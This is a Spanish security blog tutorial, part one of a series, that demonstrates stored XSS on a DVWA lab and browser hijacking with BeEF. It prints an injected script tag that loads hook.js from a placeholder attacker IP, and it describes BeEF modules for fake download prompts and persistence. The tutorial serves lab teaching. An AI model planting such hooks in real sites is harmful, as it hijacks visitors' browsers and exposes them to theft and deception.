0
  • ENTRAR

  • No hay productos en el carrito.

Llevando XSS al siguiente nivel – Parte 1

Advertencia Legal

Las técnicas y herramientas que se van a mostrar persiguen un propósito estrictamente educacional y de investigación. Se advierte al lector que su uso malintencionado podría derivar en sanciones económicas y en penas de prisión. Tanto el autor de este artículo como el centro de enseñanza Comunix o Novared deniegan cualquier tipo de responsabilidad sobre el mal uso que alguien le pudiera dar al conocimiento adquirido en esta lectura.

¿XSS?

XSS (Cross Site Scripting) es una vulnerabilidad generalmente asociada a las aplicaciones web, que permite a un usuario no autorizado inyectar código dentro de una página, de forma que cuando otros usuarios visiten la página ejecutarán el código en sus navegadores.

El ejemplo más genérico para confirmar la existencia de esta vulnerabilidad es introducir el siguiente script de Javascript dentro de un formulario:

<script>alert(1)</script>

Si al abrir el mensaje creado con el formulario nos salta una alerta con un “1” entonces esa página es vulnerable a XSS.

Una vez que se confirma la existencia de una vulnerabilidad XSS en una página se tiene la certeza de que existe un mecanismo para inyectar código Javascript en ella y se ha conseguido demostrar una vulnerabilidad con cierto nivel de peligrosidad, pero para demostrarlo solo tenemos un mensaje con un “1” entonces…

¿Como se puede explotar esta vulnerabilidad?
¿Como demostrar en una auditoría que la vulnerabilidad efectivamente es peligrosa?
¿Que podría hacer un atacante para aprovecharse de su existencia?

Una posibilidad sería utilizar la vulnerabilidad para inyectar un código Javascript que realice una conexión a una máquina del atacante donde tendría escuchando un servidor como BeEF.
Una vez hecha la conexión, el atacante podría usar BeEF para tener el control del navegador, acceso a toda la información del sistema y ejecutar una amplia gama de scripts maliciosos que, dependiendo del tipo y versión de navegador o el sistema operativo del objetivo, pueden causar estragos en el sistema auditado.

¿BeEF?

BeEF (Browser Explotation Framework) es una herramienta de seguridad para pruebas de penetración en navegadores web.

Viene instalado en Kali Linux y al iniciarse arranca un servidor web en el puerto 3000 que presenta 2 partes:

1. Script hook.js: Es el “enganche” encargado de iniciar la conexión desde los navegadores hacia BeEF.

http://DIRECCION_IP:3000/hook.js

2. Panel de control: Donde se podrán controlar los navegadores.

http://DIRECCION_IP:3000/ui/panel

Cuando un navegador ejecuta el código de hook.js se “engancha” al PC del Atacante enviándole peticiones constantemente en espera de ejecutar más código. El atacante puede controlar de forma remota los navegadores “enganchados” desde el panel de control mediante la ejecución de scripts.

Estos scripts podrían permitirle al atacante:

  • Obtener información del objetivo, sistema operativo, navegador, versiones, plugins instalados, URLs visitadas, cookies…
  • Detectar cortafuegos o proxies.
  • Acceder a la Webcam
  • Realizar ataques de ingeniería social mostrando mensajes en el navegador solicitando la interacción del usuario.
  • Abrir una shell con la máquina
  • Escalar privilegios
  • Realizar ataques de denegación de servicio
  • Etc.

Prueba de concepto

El objetivo de esta prueba será demostrar como un atacante puede inyectar código Javascript en una página web usando una vulnerabilidad XSS, y como puede hacerse con el control del navegador de todo aquel que entre en esa página web.

Para esta prueba se van a usar 3 máquinas virtuales:

Máquina Atacante:

Kali Linux.
Viene con BeEF ya instalado.
https://www.kali.org/downloads/

Máquina vulnerable a XSS:

Máquina con DVWA (Damn Vulnerable Web Application).
Es una máquina linux que al arrancar inicia un servidor web con una aplicación (DVWA) usada generalmente para practicar con vulnerabilidades web de varios tipos, entre ellas XSS.
https://www.vulnhub.com/entry/damn-vulnerable-web-application-dvwa-107,43/

Máquina Objetivo:

Windows 10
Google Chrome
https://www.microsoft.com/en-us/software-download/windowsinsiderpreviewiso

(Hay que registrarse)

Parte 1: Inyección de código en la máquina vulnerable a XSS

Desde el PC Atacante se descubre una vulnerabilidad XSS persistente en una de las páginas web alojadas en el PC Vulnerable a XSS.

El atacante introduce <script>alert(1)</script>

Desde el PC Atacante se aprovecha la vulnerabilidad para inyectar código javascript en la página web.

El atacante introduce <script src=»http://IP_BEEF:3000/hook.js»></script>

El PC Atacante arranca el software BeEF y lo deja a la escucha.

Parte 2: Ejecución de código en la máquina objetivo

El atacante sólo tiene que esperar a que alguien entre en la página donde ha inyectado el código para conseguir controlar su navegador.

El PC Objetivo está visitando las páginas web alojadas en el PC Vulnerable a XSS y que aloja la página web que contiene el código Javascript inyectado por el atacante.

El software BeEF gestiona la conexión recibida.

Se pueden usar las opciones de BeEF agrupadas por categorías.

El significado de cada color es el siguiente:

  • Verde: El módulo funcionará y será invisible al usuario
  • Naranja: El módulo funcionará y será visible al usuario
  • Blanco: El módulo no ha sido probado contra ese objetivo todavía
  • Rojo: El módulo no funciona contra ese objetivo

Parte 3: Control remoto de los navegadores

En la pestaña “Current Browser” se encuentra el panel de control sobre el navegador seleccionado.
Dentro de este panel lo primero que se ve son los detalles del navegador.

Dependiendo del sistema operativo y el navegador del objetivo, el atacante podrá ejecutar unos scripts u otros con BeEF.

En la pestaña “Commands” se pueden ver los módulos disponibles.

A continuación se muestran algunos ejemplos:

→ Browser → Hooked Domains → Create Alert Dialog

Envía una alerta al usuario.

La alerta se muestra en el navegador.

→ Network → Detect Social Networks

Detecta si el usuario se ha autenticado en alguna red social.

→ Social Engineering → Fake Notification Bar (Chrome)

Muestra una barra de notificación en la parte superior de la pantalla. Si el usuario hace click sobre ella será redireccionado para descargar un fichero.

Se muestra un mensaje en la parte superior del navegador que requiere la instalación de plugins.

→ Persistence → Man-In-The-Browser

Se asegura de que la conexión permanece hasta que el usuario cambia la url en la barra de direcciones manualmente.

Por no alargar demasiado el artículo he decidido dividirlo en varias partes. Esta primera parte ha sido una introducción para ver un ejemplo de como funciona el secuestro de navegadores con BeEF. La prueba se ha realizado sobre una máquina con Windows 10 actualizado y un navegador Google Chrome actualizado, por lo que gran parte de los scripts y exploits de BeEF no tienen efectividad, aunque hay otros que sí funcionan como se ha podido comprobar.

La segunda parte de este artículo estará centrada en la explotación, se explicará como se integra Metasploit para usar sus módulos dentro de BeEF y se ejecutarán exploits sobre los navegadores de máquinas con configuraciones vulnerables.

Jose Arquillo

Ingeniero en Informática colegiado en el CPIIA, Máster en Seguridad Informática, programador con más de 10 años de experiencia, y aprendiz de hacker y forense desde hace varios años. Actualmente trabajando como programador y estudiando para obtener algunas certificaciones de ciberseguridad.

      

¿Qué es un Ransomware?

Download WordPress ThemesDownload WordPress ThemesDownload WordPress Themes FreeFree Download WordPress Themesdownload udemy paid course for freedownload intex firmwareDownload Best WordPress Themes Free Downloadfree online course

Leer más

¿Qué es el grooming?

Free Download WordPress ThemesDownload WordPress Themes FreeFree Download WordPress ThemesDownload WordPress Themes Freeudemy course download freedownload huawei firmwareDownload Nulled WordPress Themesfree online course

Leer más

¿Qué es un Malware?

Download Best WordPress Themes Free DownloadFree Download WordPress ThemesDownload Premium WordPress Themes FreeDownload WordPress Themes Freeudemy paid course free downloaddownload huawei firmwareDownload Best WordPress Themes Free Downloadonline free course

Leer más

¿Qué es un Honeypot?

Free Download WordPress ThemesDownload Premium WordPress Themes FreePremium WordPress Themes DownloadFree Download WordPress Themesonline free coursedownload coolpad firmwareDownload WordPress Themesfree download udemy paid course

Leer más
6 febrero, 2019

1 respuestas sobre "Llevando XSS al siguiente nivel - Parte 1"

  1. Daniel Bautista García14 febrero, 2019 at 12:00

    Muy guapo el artículo! Conciso y bien mostradas todas esas funciones.
    Espectante de la siguiente publicación! ; )

Deja un mensaje

Copyright © 2020 - Todos los derechos reservados. - Aviso Legal -

Centro de preferencias de privacidad

Gestión de consentimientos

La visita a este sitio Web no implica que el usuario esté obligado a facilitar ninguna información. En el caso de que el usuario facilite alguna información de carácter personal, los datos recogidos en este sitio web serán tratados de forma leal y lícita con sujeción en todo momento a los principios y derechos recogidos en el Reglamento (UE) 2016/679, de 27 de abril, General de Protección de Datos (RGPD) y demás normativa aplicable.

En cumplimiento de lo dispuesto en el artículo 13 del RGPD te informamos de lo siguiente:

RESPONSABLE:
- Comunix Group S.L. (en adelante, Comunix)
- Avda. De Las Américas 3, 4º A, 29002, Málaga, España.
- Teléfono de contacto: (+34) 951 043 792

Se comunica a los usuarios, a través de este aviso, que pueden utilizarse cookies cuando el usuario navega por las diferentes páginas del sitio web https://www.comunixgroup.com

Durante la navegación por el sitio web, el usuario acepta y autoriza expresamente el uso de cookies de acuerdo con la presente Política de Cookies.

¿QUÉ SON LAS COOKIES?
Las cookies son ficheros que se descargan en el equipo o dispositivo (ordenador/smartphone/tablet) del usuario al acceder a determinadas páginas web y que se almacenan en la memoria del mismo.

Son herramientas que tienen un papel esencial para la prestación de numerosos servicios de la sociedad de la información Las cookies permiten, entre otras cosas, almacenar y recuperar información sobre los hábitos de navegación del usuario o de su equipo, ver qué páginas se visitan, el tiempo de conexión, analizar el funcionamiento de una página, reconocer al usuario, mejorar el servicio ofrecido, si existen problemas técnicos, etc.

TIPOS DE COOKIES
Según quien sea la entidad que gestione el dominio desde donde se envían las cookies y trate los datos que se obtengan se pueden distinguir dos tipos:

Cookies propias. Son las que pertenecen a https://www.comunixgroup.com

Cookies de terceros. El sitio web https://www.comunixgroup.com puede utilizar servicios de terceros que, por cuenta de https://www.comunixgroup.com, recopilaran información con fines estadísticos, sobre el uso del sitio web por parte del usuario y para la prestación de otros servicios relacionados con la actividad del sitio web y otros servicios de Internet. En particular, este sitio web utiliza Google Analytics, un servicio analítico de web prestado por Google, Inc. con domicilio en los Estados Unidos con sede central en 1600 Amphitheatre Parkway, Mountain View, California 94043. Para la prestación de estos servicios, estos utilizan cookies que recopilan la información, incluida la dirección IP del usuario, que será transmitida, tratada y almacenada por Google en los términos fijados en la web Google.com, incluyendo la posible transmisión de dicha información a terceros por razones de exigencia legal o cuando dichos terceros procesen la información por cuenta de Google.

Por otra parte, existe una segunda clasificación según el plazo de tiempo que permanecen almacenadas en el navegador del cliente, pudiendo tratarse de:

COOKIES DE SESIÓN
Son archivos temporales, que se borran cuando el usuario cierra el navegador. La cookie de sesión se generará y almacena la información de navegación, permaneciendo activa hasta que el usuario abandone el sitio web.

COOKIES PERSISTENTES
Las cookies permanentes ayudan a los sitios web a recordar la información y ajustes cuando el usuario los visita más adelante. Esto conlleva un acceso más rápido y sencillo ya que, por ejemplo, el usuario que iniciar sesión de nuevo. Además de la autentificación, otras páginas web tienen más funciones para las cookies permanentes, como: selección de idioma, selección de tema, preferencias de menú, marca páginas internos de la web, o favoritos, entre otros.

Por último, existe otra clasificación con cinco tipos de cookies según la finalidad para la que se traten los datos obtenidos:

COOKIES TÉCNICAS
Son aquéllas que permiten al usuario la navegación a través de una página web, plataforma o aplicación y la utilización de las diferentes opciones o servicios que en ella existan como, por ejemplo, controlar el tráfico y la comunicación de datos, identificar la sesión, acceder a partes de acceso restringido, recordar los elementos que integran un pedido, realizar el proceso de compra de un pedido, realizar la solicitud de inscripción o participación en un evento, utilizar elementos de seguridad durante la navegación, almacenar contenidos para la difusión de videos o sonido o compartir contenidos a través de redes sociales.

COOKIES DE PERSONALIZACIÓN
Son aquéllas que permiten al usuario acceder al servicio con algunas características de carácter general predefinidas en función de una serie de criterios en el terminal del usuario como por ejemplo serian el idioma, el tipo de navegador a través del cual accede al servicio, la configuración regional desde donde accede al servicio, etc.

COOKIES DE ANÁLISIS
Son aquéllas que bien tratadas por nosotros o por terceros, nos permiten cuantificar el número de usuarios y así realizar la medición y análisis estadístico de la utilización que hacen los usuarios del servicio ofertado. Para ello se analiza su navegación en nuestra página web con el fin de mejorar la oferta de productos o servicios que le ofrecemos.

COOKIES PUBLICITARIAS
Son aquéllas que, bien tratadas por nosotros o por terceros, nos permiten gestionar de la forma más eficaz posible la oferta de los espacios publicitarios que hay en la página web, adecuando el contenido del anuncio al contenido del servicio solicitado o al uso que realice de nuestra página web. Para ello podemos analizar sus hábitos de navegación en Internet y podemos mostrarle publicidad relacionada con su perfil de navegación.

COOKIES DE PUBLICIDAD COMPORTAMENTAL
Son aquéllas que permiten la gestión, de la forma más eficaz posible, de los espacios publicitarios que, en su caso, el editor haya incluido en una página web, aplicación o plataforma desde la que presta el servicio solicitado. Estas cookies almacenan información del comportamiento de los usuarios obtenida a través de la observación continuada de sus hábitos de navegación, lo que permite desarrollar un perfil específico para mostrar publicidad en función del mismo.

COOKIES SOCIALES
Cookies de redes sociales externas, que se utilizan para que los visitantes puedan interactuar con el contenido de diferentes plataformas sociales (Facebook y Twitter) y que se generan únicamente para los usuarios de dichas redes sociales. Las condiciones de utilización de estas cookies y la información recopilada se regula por la política de privacidad de la plataforma social correspondiente.



Actualizado: 25 de mayo de 2018

Necesarias

Estas cookies guardan la información necesaria durante la sesión y los cambios relacionados con ella, y también determinan si está registrado o no en la web.

Cookies utilizadas

Obligatorio
_gat, _gid, _ga

Análisis

Realizar informes sobre las interacciones de los usuarios del sitio web. Estas cookies se utilizan para almacenar información de identificación no personal. Los navegadores no comparten cookies de origen a través de distintos dominios.

Cookies utilizadas

_utma, _utmb, _utmc, _utmz, _ga, _gat

Other

screen tagSoporte